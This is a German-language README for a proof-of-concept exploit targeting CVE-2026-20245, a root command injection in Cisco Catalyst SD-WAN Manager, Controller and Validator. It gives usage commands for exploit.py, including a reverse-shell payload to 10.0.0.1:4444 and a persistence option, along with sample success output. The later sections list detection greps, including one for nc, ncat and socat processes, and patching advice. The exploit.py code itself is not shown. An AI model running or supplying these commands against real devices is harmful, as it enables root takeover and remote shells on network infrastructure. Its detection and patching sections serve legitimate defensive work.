
**Dieser Code dient NUR zu Bildungszwecken und autorisierten Sicherheitstests.**
Dieser Code ist NUR für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
CVE-2026-20245 ist eine Privilegieneskalations-Schwachstelle in der CLI von Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) und Cisco Catalyst SD-WAN Validator (vBond). Ein authentifizierter Angreifer mit netadmin-Privilegien kann durch das Hochladen einer speziell gestalteten Datei beliebige Befehle als root ausführen.
| Feld | Wert |
|---|---|
| CVE | CVE-2026-20245 |
| CVSS | 7.8 (High) |
| Vektor | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Komponente | CLI / CSV-Upload |
| Typ | Command Injection (CWE-116) |
| Produkt | Verwundbare Versionen |
|---|---|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
# Repository klonen
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Abhängigkeiten installieren
pip install -r requirements.txt
# Berechtigungen erteilen
chmod +x exploit.py
requests>=2.31.0
Version prüfen
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
Befehl ausführen
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
Reverse Shell
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Persistenz installieren
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
In Logs prüfen (/var/log/scripts.log)
# Nach verdächtiger Aktivität suchen
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# Bestimmte Befehle, nach denen gesucht werden soll
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Verdächtige Dateien
/home/admin/*.csv (nicht autorisierte CSV-Dateien)
/tmp/*.csv
/var/log/scripts.log mit ungewöhnlichen Einträgen
Prozesse
# Nach ungewöhnlichen Root-Prozessen suchen
ps aux | grep -E "bash|sh|nc|ncat|socat"
Option 1 - Auf behobene Version aktualisieren (EMPFOHLEN)
Version Behobene Version 20.18.2.1 und früher 20.18.3.1
Option 2 - Zugriff einschränken
Administrativen Zugriff auf das Verwaltungsnetzwerk beschränken
Multi-Faktor-Authentifizierung verwenden
CSV-Upload-Aktivität überwachen
Option 3 - Sichere Konfiguration
# Serial-Nummern-Upload deaktivieren, falls nicht erforderlich
no feature upload-serial-numbers
# netadmin-Privilegien einschränken
admin privilege restrict
Cisco Security Advisory
NVD - CVE-2026-20245
CISA KEV Catalog
| Datum | Ereignis |
|---|---|
| 2026-05-14 | Cisco veröffentlicht erstes Advisory |
| 2026-06-04 | CVE offiziell veröffentlicht |
| 2026-06-09 | CISA fügt zu KEV hinzu |
| 2026-06-23 | CISA-Frist zum Patchen |
Diese Software wird „wie besehen" ohne Gewährleistung bereitgestellt. Der Autor ist nicht für missbräuchliche Verwendung verantwortlich. Verwenden Sie sie ausschließlich auf autorisierten Systemen.